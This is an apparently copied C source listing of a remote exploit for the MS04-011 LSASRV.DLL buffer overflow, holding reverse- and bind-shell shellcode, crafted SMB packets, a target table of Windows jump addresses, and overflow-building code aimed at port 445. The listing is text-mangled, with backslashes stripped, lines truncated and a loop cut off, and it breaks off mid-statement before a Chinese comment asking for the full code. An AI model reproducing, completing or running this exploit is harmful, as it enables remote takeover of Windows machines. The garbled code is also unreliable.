#include
#include
#pragma comment(lib, “ws2_32″)
// reverse shellcode
unsigned char reverseshell[] =
“xEBx10×5Bx4Bx33xC9×66xB9×25x01×80x34×0Bx99xE2xFA”
“xEBx05xE8xEBxFFxFFxFF”
“x70×62x99×99x99xC6xFDx38xA9×99x99×99x12xD9×95x12″
“xE9×85x34×12xF1×91x12×6ExF3×9DxC0×71x02×99x99×99″
“x7Bx60xF1xAAxABx99×99xF1xEExEAxABxC6xCDx66×8Fx12″
“x71xF3×9DxC0×71x1Bx99×99x99×7Bx60×18x75×09x98×99″
“x99xCDxF1×98x98×99x99×66xCFx89xC9xC9xC9xC9xD9xC9″
“xD9xC9×66xCFx8Dx12×41xF1xE6×99x99×98xF1×9Bx99×9D”
“x4Bx12×55xF3×89xC8xCAx66xCFx81×1Cx59xECxD3xF1xFA”
“xF4xFDx99×10xFFxA9×1Ax75xCDx14xA5xBDxF3×8CxC0×32″
“x7Bx64×5FxDDxBDx89xDDx67xDDxBDxA4×10xC5xBDxD1×10″
“xC5xBDxD5×10xC5xBDxC9×14xDDxBDx89xCDxC9xC8xC8xC8″
“xF3×98xC8xC8×66xEFxA9xC8×66xCFx9Dx12×55xF3×66x66″
“xA8×66xCFx91xCAx66xCFx85×66xCFx95xC8xCFx12xDCxA5″
“x12xCDxB1xE1×9Ax4CxCBx12xEBxB9×9Ax6CxAAx50xD0xD8″
“x34×9Ax5CxAAx42×96x27×89xA3×4FxEDx91×58x52×94x9A”
“x43xD9×72x68xA2×86xECx7ExC3×12xC3xBDx9Ax44xFFx12″
“x95xD2×12xC3×85x9Ax44×12x9Dx12×9Ax5Cx32xC7xC0×5A”
“x71×99x66×66x66×17xD7×97x75xEBx67×2Ax8Fx34×40x9C”
“x57×76x57×79xF9×52x74×65xA2×40x90×6Cx34×75x60×33″
“xF9×7ExE0×5FxE0″;
// bind shellcode
unsigned char bindshell[] =
“xEBx10×5Ax4Ax33xC9×66xB9×7Dx01×80x34×0Ax99xE2xFA”
“xEBx05xE8xEBxFFxFFxFF”
“x70×95x98×99x99xC3xFDx38xA9×99x99×99x12xD9×95x12″
“xE9×85x34×12xD9×91x12×41x12xEAxA5×12xEDx87xE1×9A”
“x6Ax12xE7xB9×9Ax62×12xD7×8DxAAx74xCFxCExC8×12xA6″
“x9Ax62×12x6BxF3×97xC0×6Ax3FxEDx91xC0xC6×1Ax5Ex9D”
“xDCx7Bx70xC0xC6xC7×12x54×12xDFxBDx9Ax5Ax48×78x9A”
“x58xAAx50xFFx12×91x12xDFx85×9Ax5Ax58×78x9Bx9Ax58″
“x12×99x9Ax5Ax12×63x12×6Ex1Ax5Fx97×12x49xF3×9AxC0″
“x71×1Ex99×99x99×1Ax5Fx94xCBxCFx66xCEx65xC3×12x41″
“xF3×9CxC0×71xEDx99×99x99xC9xC9xC9xC9xF3×98xF3×9B”
“x66xCEx75×12x41×5Ex9Ex9Bx99×9Dx4BxAAx59×10xDEx9D”
“xF3×89xCExCAx66xCEx69xF3×98xCAx66xCEx6DxC9xC9xCA”
“x66xCEx61×12x49×1Ax75xDDx12×6DxAAx59xF3×89xC0×10″
“x9Dx17×7Bx62×10xCFxA1×10xCFxA5×10xCFxD9xFFx5ExDF”
“xB5×98x98×14xDEx89xC9xCFxAAx50xC8xC8xC8xF3×98xC8″
“xC8×5ExDExA5xFAxF4xFDx99×14xDExA5xC9xC8×66xCEx79″
“xCBx66xCEx65xCAx66xCEx65xC9×66xCEx7DxAAx59×35x1C”
“x59xECx60xC8xCBxCFxCAx66×4BxC3xC0×32x7Bx77xAAx59″
“x5Ax71×76x67×66x66xDExFCxEDxC9xEBxF6xFAxD8xFDxFD”
“xEBxFCxEAxEAx99xDAxEBxFCxF8xEDxFCxC9xEBxF6xFAxFC”
“xEAxEAxD8×99xDCxE1xF0xEDxCDxF1xEBxFCxF8xFDx99xD5″
“xF6xF8xFDxD5xF0xFBxEBxF8xEBxE0xD8×99xEExEAxABxC6″
“xAAxABx99xCExCAxD8xCAxF6xFAxF2xFCxEDxD8×99xFBxF0″
“xF7xFDx99xF5xF0xEAxEDxFCxF7×99xF8xFAxFAxFCxE9xED”
“x99xFAxF5xF6xEAxFCxEAxF6xFAxF2xFCxEDx99″;
char req1[] =
“x00×00x00×85xFFx53×4Dx42×72x00×00x00×00x18×53xC8″
“x00×00x00×00x00×00x00×00x00×00x00×00x00×00xFFxFE”
“x00×00x00×00x00×62x00×02x50×43x20×4Ex45×54x57×4F”
“x52×4Bx20×50x52×4Fx47×52x41×4Dx20×31x2Ex30×00x02″
“x4Cx41×4Ex4Dx41×4Ex31×2Ex30×00x02×57x69×6Ex64×6F”
“x77×73x20×66x6Fx72×20x57×6Fx72×6Bx67×72x6Fx75×70″
“x73×20x33×2Ex31×61x00×02x4Cx4Dx31×2Ex32×58x30×30″
“x32×00x02×4Cx41×4Ex4Dx41×4Ex32×2Ex31×00x02×4Ex54″
“x20×4Cx4Dx20×30x2Ex31×32x00″;
char req2[] =
“x00×00x00xA4xFFx53×4Dx42×73x00×00x00×00x18×07xC8″
“x00×00x00×00x00×00x00×00x00×00x00×00x00×00xFFxFE”
“x00×00x10×00x0CxFFx00xA4×00x04×11x0Ax00×00x00×00″
“x00×00x00×20x00×00x00×00x00xD4×00x00×80x69×00x4E”
“x54×4Cx4Dx53×53x50×00x01×00x00×00x97×82x08xE0×00″
“x00×00x00×00x00×00x00×00x00×00x00×00x00×00x00×00″
“x57×00x69×00x6Ex00×64x00×6Fx00×77x00×73x00×20x00″
“x32×00x30×00x30×00x30×00x20×00x32×00x31×00x39×00″
“x35×00x00×00x57×00x69×00x6Ex00×64x00×6Fx00×77x00″
“x73×00x20×00x32×00x30×00x30×00x30×00x20×00x35×00″
“x2Ex00×30x00×00x00×00x00″;
char req3[] =
“x00×00x00xDAxFFx53×4Dx42×73x00×00x00×00x18×07xC8″
“x00×00x00×00x00×00x00×00x00×00x00×00x00×00xFFxFE”
“x00×08x20×00x0CxFFx00xDAx00×04x11×0Ax00×00x00×00″
“x00×00x00×57x00×00x00×00x00xD4×00x00×80x9Fx00×4E”
“x54×4Cx4Dx53×53x50×00x03×00x00×00x01×00x01×00x46″
“x00×00x00×00x00×00x00×47x00×00x00×00x00×00x00×40″
“x00×00x00×00x00×00x00×40x00×00x00×06x00×06x00×40″
“x00×00x00×10x00×10x00×47x00×00x00×15x8Ax88xE0×48″
“x00×4Fx00×44x00×00x81×19x6Ax7AxF2xE4×49x1Cx28xAF”
“x30×25x74×10x67×53x57×00x69×00x6Ex00×64x00×6Fx00″
“x77×00x73×00x20×00x32×00x30×00x30×00x30×00x20×00″
“x32×00x31×00x39×00x35×00x00×00x57×00x69×00x6Ex00″
“x64×00x6Fx00×77x00×73x00×20x00×32x00×30x00×30x00″
“x30×00x20×00x35×00x2Ex00×30x00×00x00×00x00″;
char req4[] =
“x00×00x00×5CxFFx53×4Dx42×75x00×00x00×00x18×07xC8″
“x00×00x00×00x00×00x00×00x00×00x00×00x00×00xFFxFE”
“x00×08x30×00x04xFFx00×5Cx00×08x00×01x00×31x00×00″
“x5Cx00×5Cx00×31x00×39x00×32x00×2Ex00×31x00×36x00″
“x38×00x2Ex00×31x00×2Ex00×32x00×31x00×30x00×5Cx00″
“x49×00x50×00x43×00x24″
“x00×00x00×3Fx3Fx3Fx3Fx3Fx00″;
char req5[] =
“x00×00x00×64xFFx53×4Dx42xA2×00x00×00x00×18x07xC8″
“x00×00x00×00x00×00x00×00x00×00x00×00x00×08xDCx04″
“x00×08x40×00x18xFFx00xDExDEx00×0Ex00×16x00×00x00″
“x00×00x00×00x9Fx01×02x00×00x00×00x00×00x00×00x00″
“x00×00x00×00x03×00x00×00x01×00x00×00x40×00x00×00″
“x02×00x00×00x03×11x00×00x5Cx00×6Cx00×73x00×61x00″
“x72×00x70×00x63×00x00×00″;
char req6[] =
“x00×00x00×9CxFFx53×4Dx42×25x00×00x00×00x18×07xC8″
“x00×00x00×00x00×00x00×00x00×00x00×00x00×08xDCx04″
“x00×08x50×00x10×00x00×48x00×00x00×00x04×00x00×00″
“x00×00x00×00x00×00x00×00x00×54x00×48x00×54x00×02″
“x00×26x00×00x40×59x00×10x5Cx00×50x00×49x00×50x00″
“x45×00x5Cx00×00x00×00x00×05x00×0Bx03×10x00×00x00″
“x48×00x00×00x01×00x00×00xB8×10xB8×10x00×00x00×00″
“x01×00x00×00x00×00x01×00x6Ax28×19x39×0CxB1xD0×11″
“x9BxA8×00xC0×4FxD9×2ExF5×00x00×00x00×04x5Dx88×8A”
“xEBx1CxC9×11x9FxE8×08x00×2Bx10×48x60×02x00×00x00″;
char req7[] =
“x00×00x0CxF4xFFx53×4Dx42×25x00×00x00×00x18×07xC8″
“x00×00x00×00x00×00x00×00x00×00x00×00x00×08xDCx04″
“x00×08x60×00x10×00x00xA0×0Cx00×00x00×04x00×00x00″
“x00×00x00×00x00×00x00×00x00×54x00xA0×0Cx54×00x02″
“x00×26x00×00x40xB1×0Cx10×5Cx00×50x00×49x00×50x00″
“x45×00x5Cx00×00x00×00x00×05x00×00x03×10x00×00x00″
“xA0×0Cx00×00x01×00x00×00x88×0Cx00×00x00×00x09×00″
“xECx03×00x00×00x00×00x00xECx03×00x00″;
// room for shellcode here …
char shit1[] =
“x95×14x40×00x03×00x00×00x7Cx70×40x00×01x00×00x00″
“x00×00x00×00x01×00x00×00x00×00x00×00x01×00x00×00″
“x00×00x00×00x01×00x00×00x00×00x00×00x01×00x00×00″
“x00×00x00×00x01×00x00×00x00×00x00×00x01×00x00×00″
“x00×00x00×00x01×00x00×00x00×00x00×00x7Cx70×40x00″
“x01×00x00×00x00×00x00×00x01×00x00×00x00×00x00×00″
“x7Cx70×40x00×01x00×00x00×00x00×00x00×01x00×00x00″
“x00×00x00×00x7Cx70×40x00×01x00×00x00×00x00×00x00″
“x01×00x00×00x00×00x00×00x78×85x13×00xABx5BxA6xE9″;
char req8[] =
“x00×00x10xF8xFFx53×4Dx42×2Fx00×00x00×00x18×07xC8″
“x00×00x00×00x00×00x00×00x00×00x00×00x00×08xFFxFE”
“x00×08x60×00x0ExFFx00xDExDEx00×40x00×00x00×00xFF”
“xFFxFFxFFx08×00xB8×10x00×00xB8×10x40×00x00×00x00″
“x00xB9×10xEEx05×00x00×01x10×00x00×00xB8×10x00×00″
“x01×00x00×00x0Cx20×00x00×00x00×09x00xADx0Dx00×00″
“x00×00x00×00xADx0Dx00×00″;
// room for shellcode here …
char req9[] =
“x00×00x0FxD8xFFx53×4Dx42×25x00×00x00×00x18×07xC8″
“x00×00x00×00x00×00x00×00x00×00x00×00x00×08x18×01″
“x00×08x70×00x10×00x00×84x0Fx00×00x00×04x00×00x00″
“x00×00x00×00x00×00x00×00x00×54x00×84x0Fx54×00x02″
“x00×26x00×00x40×95x0Fx00×5Cx00×50x00×49x00×50x00″
“x45×00x5Cx00×00x00×00x00×05x00×00x02×10x00×00x00″
“x84×0Fx00×00x01×00x00×00x6Cx0Fx00×00x00×00x09×00″;
char shit3[] =
“x00×00x00×00x9AxA8×40x00×01x00×00x00×00x00×00x00″
“x01×00x00×00x00×00x00×00x01×00x00×00x00×00x00×00″
“x01×00x00×00x00×00x00×00x01×00x00×00x00×00x00×00″
“x01×00x00×00″
“x00×00x00×00x01×00x00×00x00×00x00×00x01×00x00×00″
“x00×00x00×00x9AxA8×40x00×01x00×00x00×00x00×00x00″
“x01×00x00×00x00×00x00×00x9AxA8×40x00×01x00×00x00″
“x00×00x00×00x01×00x00×00x00×00x00×00x9AxA8×40x00″
“x01×00x00×00x00×00x00×00x01×00x00×00x00×00x00×00″;
#define LEN 3500
#define BUFSIZE 2000
#define NOP 0×90
struct targets {
int num;
char name[50];
long jmpaddr;
} ttarget[]= {
{ 0, “WinXP Professional [universal] lsass.exe “, 0×01004600 }, // jmp esp addr
{ 1, “Win2k Professional [universal] netrap.dll”, 0×7515123c }, // jmp ebx addr
{ 2, “Win2k Advanced Server [SP4] netrap.dll”, 0×751c123c }, // jmp ebx addr
//{ 3, “reboot”, 0xffffffff }, // crash
{ NULL }
};
/*
 * usage: print the banner, the hard-coded target table and the option
 * summary, then terminate the process with exit(0). Called from main()
 * when fewer than three positional arguments are supplied. Note that this
 * copy of the listing is text-mangled: the quote characters are typographic
 * rather than ASCII, the format string on the "%s" line is truncated, and
 * the escape sequences have lost their backslashes, so the block as shown
 * is not compilable C.
 */
void usage(char *prog)
{
int i;
printf(”MS04-011 LSASRV.DLL Remote Exploitn”);
printf(”Compiled by HBU-LK007 (LK007@163.com)n”);
printf(”Usage:nn”);
printf(”%s
printf(”Targets:n”);
/* The bound 3 is hard-coded rather than derived from the ttarget table;
 * the table is an array, and the element expressions here carry no [i]
 * index in this copy of the listing. */
for (i=0; i<3; i++)
printf(” %d [0x%.8x]: %sn”, ttarget.num, ttarget.jmpaddr, ttarget.name);
printf(”nOptions:n”);
printf(” -t: Detect remote OS:n”);
printf(” Windows 5.1 - WinXPn”);
printf(” Windows 5.0 - Win2knn”);
printf(”Example:n”);
printf(”LSASS 0 192.168.1.10 4444 -tn”);
printf(”LSASS 0 192.168.1.10 4444n”);
printf(”nc 192.168.1.10 4444n”);
/* Help output always ends the program; exit status 0 even on bad usage. */
exit(0);
}
int main(int argc, char *argv[])
{
int i;
int opt = 0;
char *target;
char hostipc[40];
char hostipc2[40*2];
unsigned short port;
unsigned long ip;
unsigned char *sc;
char buf[LEN+1];
char sendbuf[(LEN+1)*2];
char req4u[sizeof(req4)+20];
char screq[BUFSIZE+sizeof(req7)+1500+440];
char screq2k[4348+4060];
char screq2k2[4348+4060];
char recvbuf[1600];
char strasm[]=”x66×81xECx1Cx07xFFxE4″;
char strBuffer[BUFSIZE];
unsigned int targetnum = 0;
int len, sockfd;
short dport = 445;
struct hostent *he;
struct sockaddr_in their_addr;
char smblen;
char unclen;
WSADATA wsa;
printf(”nMS04011 Lsasrv.dll RPC buffer overflow remote exploit v0.1n”);
printf(”— Coded by .::[ houseofdabus ]::. —nn”);
if (argc < 4) {
usage(argv[0]);
}
target = argv[2];
sprintf((char *)hostipc,"\%s\ipc$", target);
for (i=0; i<40; i++) {
hostipc2[i*2] = hostipc;
hostipc2[i*2+1] = 0;
}
memcpy(req4u, req4, sizeof(req4)-1);
memcpy(req4u+48, &hostipc2[0], strlen(hostipc)*2);
memcpy(req4u+47+strlen(hostipc)*2, req4+87, 9);
smblen = 52+(char)strlen(hostipc)*2;
memcpy(req4u+3, &smblen, 1);
unclen = 9 + (char)strlen(hostipc)*2;
memcpy(req4u+45, &unclen, 1);
if (argc > 4)
if (!memcmp(argv[4], “-t”, 2)) opt = 1;
if ( (argc > 4) && !opt ) {
port = htons(atoi(argv[3]))^(USHORT)0×9999;
ip = inet_addr(argv[4])^(ULONG)0×99999999;
memcpy(&reverseshell[118], &port, 2);
memcpy(&reverseshell[111], &ip, 4);
sc = reverseshell;
} else {
port = htons(atoi(argv[3]))^(USHORT)0×9999;
memcpy(&bindshell[176], &port, 2);
sc = bindshell;
}
if ( (atoi(argv[1]) == 1) || (atoi(argv[1]) == 2)) {
memset(buf, NOP, LEN);
//memcpy(&buf[2020], “x3cx12×15x75″, 4);
memcpy(&buf[2020], &ttarget[atoi(argv[1])].jmpaddr, 4);
memcpy(&buf[2036], sc, strlen(sc));
memcpy(&buf[2840], “xebx06xebx06″, 4);
memcpy(&buf[2844], &ttarget[atoi(argv[1])].jmpaddr, 4); // jmp ebx addr
//memcpy(&buf[2844], “x3cx12×15x75″, 4); // jmp ebx addr
memcpy(&buf[2856], sc, strlen(sc));
for (i=0; i
sendbuf[i*2+1] = 0;
}
sendbuf[LEN*2]=0;
sendbuf[LEN*2+1]=0;
memset(screq2k, 0x31, (BUFSIZE+sizeof(req7)+1500)*2);
memset(screq2k2, 0x31, (BUFSIZE+sizeof(req7)+1500)*2);
} else {
memset(strBuffer, NOP, BUFSIZE);
memcpy(strBuffer+160, sc, strlen(sc));
memcpy(strBuffer+1980, strasm, strlen(strasm));
*(long *)&strBuffer[1964]=ttarget[atoi(argv[1])].jmpaddr;
}
memset(screq, 0x31, BUFSIZE+sizeof(req7)+1500);
WSAStartup(MAKEWORD(2,0),&wsa);
if ((he=gethostbyname(argv[2])) == NULL) { // get the host info
perror("[-] gethostbyname ");
exit(1);
}
if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
perror("socket");
exit(1);
}
their_addr.sin_family = AF_INET;
their_addr.sin_port = htons(dport);
their_addr.sin_addr = *((struct in_addr *)he->h_addr);
memset(&(their_addr.sin_zero), ‘



你这个代码有一行少了点东西哦,能不能给个全的阿